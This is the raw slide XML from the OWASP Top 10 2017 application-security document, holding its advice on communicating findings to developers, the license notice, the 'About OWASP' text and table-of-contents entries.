                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>No matter how good</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you are at testing, it won’t make any difference unless you communicate it effectively. Build trust by showing you understand how the application works. Describe clearly how it can be abused without “lingo” and include an attack scenario to make it real. Make a realistic estimation of how hard the vulnerability is to discover and exploit, and how bad that would be. Finally, deliver findings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in the tools development teams are already using, not PDF files.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="95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7" name="Rectangle: Rounded Corners 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="219293" y="7214424"/>
              <a:ext cx="930295"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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA493BA7-5997-4A18-9618-62319A0A692F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="214008" y="3340604"/>
            <a:ext cx="935580" cy="715581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ct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Understand the Threat Model</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AA98B84-34A6-4B60-9C0A-BF59F260AF1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198165" y="4346975"/>
            <a:ext cx="935580" cy="715581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ct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Understand Your </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ct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SDLC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4155ED7B-C46B-4C58-9799-5E20D5780F48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="116995" y="7362310"/>
            <a:ext cx="1151765" cy="577081"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Clearly Communicate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Findings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1689320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3100801113"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="8001000"/>
          <a:ext cx="6858000" cy="11430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40914">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Copyright and License</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34"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0208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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Copyright © 2003 – 2017 The OWASP Foundation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a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>This document is released under the Creative Commons Attribution Share-Alike 4.0 license. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>For any reuse or distribution, you must make it clear to others the license terms of this work.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="13716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9" name="Picture 2" descr="by-sa.png">
            <a:hlinkClick r:id="rId4"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="8522201"/>
            <a:ext cx="1046163" cy="366027"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="Table 9"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3316503455"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="3352800" cy="7008415"/>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val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="336555">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Table of Contents</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34"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6671860">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34"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950" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>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686859042"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="990600"/>
          <a:ext cx="3429000" cy="7004304"/>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val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="337727">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>About</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> OWASP</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6666577">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain applications and APIs that can be trusted. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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At OWASP, you'll find free and open:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRP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rPr>
                        <a:t>Application security tools and standards.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRP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rPr>
                        <a:t>Complete books on application security testing, secure code development, and secure code review.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRP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rPr>
                        <a:t>Presentations and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>videos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a: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hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Cheat sheets</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> on many common topics.</a:t>
                      </a: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rPr>
                        <a:t>Standard security controls and libraries.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-8280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hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Local chapters worldwide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-8280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rPr>
                        <a:t>Cutting edge research.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-8280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rPr>
                        <a:t>Extensive </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>conferences worldwide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-8280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hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>Mailing lists</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:br>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Learn more at: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="0" i="0" u="sng" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34"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All OWASP tools, documents, videos, presentations, and chapters are free and open to anyone interested in improving application security. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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We advocate approaching application security as a people, process, and technology problem, because the most effective approaches to application security require improvements in these areas.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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OWASP is a new kind of organization. Our freedom from commercial pressures allows us to provide unbiased, practical, and cost-effective information about application security. </a:t>
                      </a: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OWASP is not affiliated with any technology company, although we support the informed use of commercial security technology. OWASP produces many types of materials in a collaborative, transparent, and open way.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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The OWASP Foundation is the non-profit entity that ensures the project's long-term success. Almost everyone associated with OWASP is a volunteer, including the OWASP board, chapter leaders, project leaders, and project members.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>We support innovative security research with grants and infrastructure.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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Come join us!</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin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4" name="Textplatzhalter 3"/>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TOC</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titel 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Table of Contents</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2313449224"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1432560"/>
          <a:ext cx="3383280" cy="5958840"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2998816">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="384464">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>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TOC</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About OWASP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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a: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12" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>1</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FW</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Foreword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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a: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13" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>2</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Introduction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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a: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14" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>3</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RN</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Release Notes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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a: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15" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>4</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Risk</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Application Security Risks</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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a: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16" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>5</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b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>T10</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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-	OWASP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Top 10 Application Security</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
